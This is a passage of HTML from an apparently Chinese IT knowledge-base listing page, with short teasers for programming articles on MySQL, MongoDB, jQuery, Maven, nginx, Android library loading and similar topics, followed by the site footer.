<a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a>
                                    <div>WebCollector主页： 
https://github.com/CrawlScript/WebCollector 
 
下载：webcollector-版本号-bin.zip将解压后文件夹中的所有jar包添加到工程既可。 
 
接下来看demo 
package org.spider.myspider;

import cn.edu.hfut.dmic.webcollector.cra</div>
                                </li>
                                <li><a href="/article/658.htm"
                                       title="jQuery append 与 after 的区别" target="_blank">jQuery append 与 after 的区别</a>
                                    <span class="text-muted">小猪猪08</span>

                                    <div>1、after函数 
定义和用法： 
after() 方法在被选元素后插入指定的内容。 
语法： 
$(selector).after(content) 
实例： 
&lt;html&gt; 
&lt;head&gt; 
&lt;script type=&quot;text/javascript&quot; src=&quot;/jquery/jquery.js&quot;&gt;&lt;/scr</div>
                                </li>
                                <li><a href="/article/785.htm"
                                       title="mysql知识充电" target="_blank">mysql知识充电</a>
                                    <span class="text-muted">香水浓</span>
<a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a>
                                    <div>索引  
索引是在存储引擎中实现的，因此每种存储引擎的索引都不一定完全相同，并且每种存储引擎也不一定支持所有索引类型。 
 
根据存储引擎定义每个表的最大索引数和最大索引长度。所有存储引擎支持每个表至少16个索引，总索引长度至少为256字节。 
 
大多数存储引擎有更高的限制。MYSQL中索引的存储类型有两种：BTREE和HASH，具体和表的存储引擎相关； 
 
MYISAM和InnoDB存储引擎</div>
                                </li>
                                <li><a href="/article/912.htm"
                                       title="我的架构经验系列文章索引" target="_blank">我的架构经验系列文章索引</a>
                                    <span class="text-muted">agevs</span>
<a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a>
                                    <div>下面是一些个人架构上的总结，本来想只在公司内部进行共享的，因此内容写的口语化一点，也没什么图示，所有内容没有查任何资料是脑子里面的东西吐出来的因此可能会不准确不全，希望抛砖引玉，大家互相讨论。 
要注意，我这些文章是一个总体的架构经验不针对具体的语言和平台，因此也不一定是适用所有的语言和平台的。 
（内容是前几天写的，现附上索引） 
&nbsp; 
 
 前端架构&nbsp;http://www.</div>
                                </li>
                                <li><a href="/article/1039.htm"
                                       title="Android so lib库远程http下载和动态注册" target="_blank">Android so lib库远程http下载和动态注册</a>
                                    <span class="text-muted">aijuans</span>
<a class="tag" taget="_blank" href="/search/andorid/1.htm">andorid</a>
                                    <div>一、背景 
&nbsp; 
&nbsp; &nbsp;在开发Android应用程序的实现，有时候需要引入第三方so lib库，但第三方so库比较大，例如开源第三方播放组件ffmpeg库, 如果直接打包的apk包里面, 整个应用程序会大很多.经过查阅资料和实验，发现通过远程下载so文件，然后再动态注册so文件时可行的。主要需要解决下载so文件存放位置以及文件读写权限问题。 
&nbsp; 
二、主要</div>
                                </li>
                                <li><a href="/article/1166.htm"
                                       title="linux中svn配置出错 conf/svnserve.conf:12: Option expected 解决方法" target="_blank">linux中svn配置出错 conf/svnserve.conf:12: Option expected 解决方法</a>
                                    <span class="text-muted">baalwolf</span>
<a class="tag" taget="_blank" href="/search/option/1.htm">option</a>
                                    <div>在客户端访问subversion版本库时出现这个错误： 
svnserve.conf:12: Option expected 
为什么会出现这个错误呢，就是因为subversion读取配置文件svnserve.conf时，无法识别有前置空格的配置文件，如### This file controls the configuration of the svnserve daemon, if you##</div>
                                </li>
                                <li><a href="/article/1293.htm"
                                       title="MongoDB的连接池和连接管理" target="_blank">MongoDB的连接池和连接管理</a>
                                    <span class="text-muted">BigCat2013</span>
<a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a>
                                    <div>在关系型数据库中，我们总是需要关闭使用的数据库连接，不然大量的创建连接会导致资源的浪费甚至于数据库宕机。这篇文章主要想解释一下mongoDB的连接池以及连接管理机制，如果正对此有疑惑的朋友可以看一下。 
通常我们习惯于new 一个connection并且通常在finally语句中调用connection的close()方法将其关闭。正巧，mongoDB中当我们new一个Mongo的时候，会发现它也</div>
                                </li>
                                <li><a href="/article/1420.htm"
                                       title="AngularJS使用Socket.IO" target="_blank">AngularJS使用Socket.IO</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/AngularJS/1.htm">AngularJS</a><a class="tag" taget="_blank" href="/search/Socket.IO/1.htm">Socket.IO</a>
                                    <div>&nbsp; &nbsp; &nbsp; &nbsp; 目前，web应用普遍被要求是实时web应用，即服务端的数据更新之后，应用能立即更新。以前使用的技术（例如polling）存在一些局限性，而且有时我们需要在客户端打开一个socket，然后进行通信。 
&nbsp; &nbsp; &nbsp; &nbsp; Socket.IO(http://socket.io/)是一个非常优秀的库，它可以帮你实</div>
                                </li>
                                <li><a href="/article/1547.htm"
                                       title="[Maven学习笔记四]Maven依赖特性" target="_blank">[Maven学习笔记四]Maven依赖特性</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/maven/1.htm">maven</a>
                                    <div>三个模块 
为了说明问题，以用户登陆小web应用为例。通常一个web应用分为三个模块，模型和数据持久化层user-core, 业务逻辑层user-service以及web展现层user-web， 
user-service依赖于user-core 
user-web依赖于user-core和user-service 
&nbsp; 
依赖作用范围 
&nbsp;Maven的dependency定义</div>
                                </li>
                                <li><a href="/article/1674.htm"
                                       title="【Akka一】Akka入门" target="_blank">【Akka一】Akka入门</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/akka/1.htm">akka</a>
                                    <div>什么是Akka 
Message-Driven Runtime is the Foundation to Reactive Applications 
In Akka, your business logic is driven through message-based communication patterns that are independent of physical locatio</div>
                                </li>
                                <li><a href="/article/1801.htm"
                                       title="zabbix_api之perl语言写法" target="_blank">zabbix_api之perl语言写法</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/zabbix_api%E4%B9%8Bperl/1.htm">zabbix_api之perl</a>
                                    <div>zabbix_api网上比较多的写法是python或curl。上次我用java－－http://bossr.iteye.com/blog/2195679，这次用perl。for example:   #!/usr/bin/perl 
 
 use 5.010 ; 
 use strict ; 
 use warnings ; 
 use JSON :: RPC :: Client ; 
 use </div>
                                </li>
                                <li><a href="/article/1928.htm"
                                       title="比优衣库跟牛掰的视频流出了，兄弟连Linux运维工程师课堂实录，更加刺激，更加实在！" target="_blank">比优衣库跟牛掰的视频流出了，兄弟连Linux运维工程师课堂实录，更加刺激，更加实在！</a>
                                    <span class="text-muted">brotherlamp</span>
<a class="tag" taget="_blank" href="/search/linux%E8%BF%90%E7%BB%B4%E5%B7%A5%E7%A8%8B%E5%B8%88/1.htm">linux运维工程师</a><a class="tag" taget="_blank" href="/search/linux%E8%BF%90%E7%BB%B4%E5%B7%A5%E7%A8%8B%E5%B8%88%E6%95%99%E7%A8%8B/1.htm">linux运维工程师教程</a><a class="tag" taget="_blank" href="/search/linux%E8%BF%90%E7%BB%B4%E5%B7%A5%E7%A8%8B%E5%B8%88%E8%A7%86%E9%A2%91/1.htm">linux运维工程师视频</a><a class="tag" taget="_blank" href="/search/linux%E8%BF%90%E7%BB%B4%E5%B7%A5%E7%A8%8B%E5%B8%88%E8%B5%84%E6%96%99/1.htm">linux运维工程师资料</a><a class="tag" taget="_blank" href="/search/linux%E8%BF%90%E7%BB%B4%E5%B7%A5%E7%A8%8B%E5%B8%88%E8%87%AA%E5%AD%A6/1.htm">linux运维工程师自学</a>
                                    <div>比优衣库跟牛掰的视频流出了，兄弟连Linux运维工程师课堂实录，更加刺激，更加实在！ 
&nbsp; 
----------------------------------------------------- 
兄弟连Linux运维工程师课堂实录-计算机基础-1-课程体系介绍1 
链接：http://pan.baidu.com/s/1i3GQtGL 密码：bl65 
&nbsp; 
兄弟连Lin</div>
                                </li>
                                <li><a href="/article/2055.htm"
                                       title="bitmap求哈密顿距离-给定N（1<=N<=100000）个五维的点A(x1,x2,x3,x4,x5)，求两个点X(x1,x2,x3,x4,x5)和Y(" target="_blank">bitmap求哈密顿距离-给定N（1<=N<=100000）个五维的点A(x1,x2,x3,x4,x5)，求两个点X(x1,x2,x3,x4,x5)和Y(</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>
import java.util.Random;

/**
 * 题目：
 * 给定N（1&lt;=N&lt;=100000）个五维的点A(x1,x2,x3,x4,x5)，求两个点X(x1,x2,x3,x4,x5)和Y(y1,y2,y3,y4,y5)，
 * 使得他们的哈密顿距离（d=|x1-y1| + |x2-y2| + |x3-y3| + |x4-y4| + |x5-y5|）最大</div>
                                </li>
                                <li><a href="/article/2182.htm"
                                       title="map的三种遍历方法" target="_blank">map的三种遍历方法</a>
                                    <span class="text-muted">chicony</span>
<a class="tag" taget="_blank" href="/search/map/1.htm">map</a>
                                    <div>  
package com.test;

import java.util.Collection;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Set;

public class TestMap {
    public static v</div>
                                </li>
                                <li><a href="/article/2309.htm"
                                       title="Linux安装mysql的一些坑" target="_blank">Linux安装mysql的一些坑</a>
                                    <span class="text-muted">chenchao051</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>1、mysql不建议在root用户下运行 
&nbsp; 
2、出现服务启动不了，111错误，注意要用chown来赋予权限， 我在root用户下装的mysql，我就把usr/share/mysql/mysql.server复制到/etc/init.d/mysqld, (同时把my-huge.cnf复制/etc/my.cnf)&nbsp; 
chown -R cc /etc/init.d/mysql</div>
                                </li>
                                <li><a href="/article/2436.htm"
                                       title="Sublime Text 3 配置" target="_blank">Sublime Text 3 配置</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/%E9%85%8D%E7%BD%AE/1.htm">配置</a><a class="tag" taget="_blank" href="/search/Sublime+Text/1.htm">Sublime Text</a>
                                    <div>Sublime Text 3 配置解释(默认){// 设置主题文件“color_scheme”: “Packages/Color Scheme – Default/Monokai.tmTheme”,// 设置字体和大小“font_face”: “Consolas”,“font_size”: 12,// 字体选项：no_bold不显示粗体字，no_italic不显示斜体字，no_antialias和</div>
                                </li>
                                <li><a href="/article/2563.htm"
                                       title="MySQL server has gone away 问题的解决方法" target="_blank">MySQL server has gone away 问题的解决方法</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/SQL+Server/1.htm">SQL Server</a>
                                    <div>MySQL server has gone away 问题解决方法，需要的朋友可以参考下。 
应用程序（比如PHP）长时间的执行批量的MYSQL语句。执行一个SQL，但SQL语句过大或者语句中含有BLOB或者longblob字段。比如，图片数据的处理。都容易引起MySQL server has gone away。&nbsp;今天遇到类似的情景，MySQL只是冷冷的说：MySQL server h</div>
                                </li>
                                <li><a href="/article/2690.htm"
                                       title="javascript/dom:固定居中效果" target="_blank">javascript/dom:固定居中效果</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a>
                                    <div>&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt; 
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&</div>
                                </li>
                                <li><a href="/article/2817.htm"
                                       title="使用 Spring 2.5 注释驱动的 IoC 功能" target="_blank">使用 Spring 2.5 注释驱动的 IoC 功能</a>
                                    <span class="text-muted">e200702084</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/bean/1.htm">bean</a><a class="tag" taget="_blank" href="/search/%E9%85%8D%E7%BD%AE%E7%AE%A1%E7%90%86/1.htm">配置管理</a><a class="tag" taget="_blank" href="/search/IOC/1.htm">IOC</a><a class="tag" taget="_blank" href="/search/Office/1.htm">Office</a>
                                    <div>使用 Spring 2.5 注释驱动的 IoC 功能 
 developerWorks 
 
 
文档选项 
 将打印机的版面设置成横向打印模式 
 
打印本页 
 将此页作为电子邮件发送 
 
将此页作为电子邮件发送 
 
级别： 初级 
 
陈 雄华 (quickselect@163.com), 技术总监, 宝宝淘网络科技有限公司 
 
2008 年 2 月 28 日 
 
&nbsp;&nb</div>
                                </li>
                                <li><a href="/article/2944.htm"
                                       title="MongoDB常用操作命令" target="_blank">MongoDB常用操作命令</a>
                                    <span class="text-muted">geeksun</span>
<a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a>
                                    <div>1. &nbsp; 基本操作 
db.AddUser(username,password) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 添加用户 
db.auth(usrename,password) &nbsp; &nbsp; &nbsp;设置数据库连接验证 
db.cloneDataBase(fromhost) &nbsp; &nbsp; </div>
                                </li>
                                <li><a href="/article/3071.htm"
                                       title="php写守护进程（Daemon）" target="_blank">php写守护进程（Daemon）</a>
                                    <span class="text-muted">hongtoushizi</span>
<a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a>
                                    <div>转载自：&nbsp;http://blog.csdn.net/tengzhaorong/article/details/9764655 
&nbsp; 
守护进程（Daemon）是运行在后台的一种特殊进程。它独立于控制终端并且周期性地执行某种任务或等待处理某些发生的事件。守护进程是一种很有用的进程。php也可以实现守护进程的功能。 
&nbsp; 
1、基本概念 
&nbsp;&nbsp;&nbs</div>
                                </li>
                                <li><a href="/article/3198.htm"
                                       title="spring整合mybatis,关于注入Dao对象出错问题" target="_blank">spring整合mybatis,关于注入Dao对象出错问题</a>
                                    <span class="text-muted">jonsvien</span>
<a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/bean/1.htm">bean</a><a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a><a class="tag" taget="_blank" href="/search/prototype/1.htm">prototype</a>
                                    <div>今天在公司测试功能时发现一问题： 
先进行代码说明： 
1，controller配置了Scope=&quot;prototype&quot;（表明每一次请求都是原子型） 
&nbsp;&nbsp; @resource/@autowired service对象都可以（两种注解都可以）。 
2，service 配置了Scope=&quot;prototype&quot;（表明每一次请求都是原子型） 
</div>
                                </li>
                                <li><a href="/article/3325.htm"
                                       title="对象关系行为模式之标识映射" target="_blank">对象关系行为模式之标识映射</a>
                                    <span class="text-muted">home198979</span>
<a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/%E4%BC%81%E4%B8%9A%E5%BA%94%E7%94%A8/1.htm">企业应用</a><a class="tag" taget="_blank" href="/search/%E5%AF%B9%E8%B1%A1%E5%85%B3%E7%B3%BB/1.htm">对象关系</a><a class="tag" taget="_blank" href="/search/%E6%A0%87%E8%AF%86%E6%98%A0%E5%B0%84/1.htm">标识映射</a>
                                    <div>HELLO!架构 
&nbsp; 
一、概念 
identity Map:通过在映射中保存每个已经加载的对象，确保每个对象只加载一次，当要访问对象的时候，通过映射来查找它们。其实在数据源架构模式之数据映射器代码中有提及到标识映射，Mapper类的getFromMap方法就是实现标识映射的实现。 
&nbsp; 
&nbsp; 
二、为什么要使用标识映射？ 
在数据源架构模式之数据映射器中 
//c</div>
                                </li>
                                <li><a href="/article/3452.htm"
                                       title="Linux下hosts文件详解" target="_blank">Linux下hosts文件详解</a>
                                    <span class="text-muted">pda158</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>　1、主机名：   　　无论在局域网还是INTERNET上，每台主机都有一个IP地址，是为了区分此台主机和彼台主机，也就是说IP地址就是主机的门牌号。   　　公网：IP地址不方便记忆，所以又有了域名。域名只是在公网（INtERNET)中存在，每个域名都对应一个IP地址，但一个IP地址可有对应多个域名。   　　局域网：每台机器都有一个主机名，用于主机与主机之间的便于区分，就可以为每台机器设置主机</div>
                                </li>
                                <li><a href="/article/3579.htm"
                                       title="nginx配置文件粗解" target="_blank">nginx配置文件粗解</a>
                                    <span class="text-muted">spjich</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/nginx/1.htm">nginx</a>
                                    <div>#运行用户#user&nbsp; nobody;#启动进程,通常设置成和cpu的数量相等worker_processes&nbsp; 2;#全局错误日志及PID文件#error_log&nbsp; logs/error.log;#error_log&nbsp; logs/error.log&nbsp; notice;#error_log&nbsp; logs/error.log&nbsp; inf</div>
                                </li>
                                <li><a href="/article/3706.htm"
                                       title="数学函数" target="_blank">数学函数</a>
                                    <span class="text-muted">w54653520</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>public&nbsp; 
class&nbsp; 
S&nbsp;{   &nbsp;   
&nbsp;&nbsp;&nbsp;&nbsp; 
//&nbsp;传入两个整数，进行比较，返回两个数中的最大值的方法。   
&nbsp;&nbsp;&nbsp;&nbsp; 
public&nbsp; 
int&nbsp; 
get( 
int&nbsp; 
num1, 
int&nbsp; 
nu</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>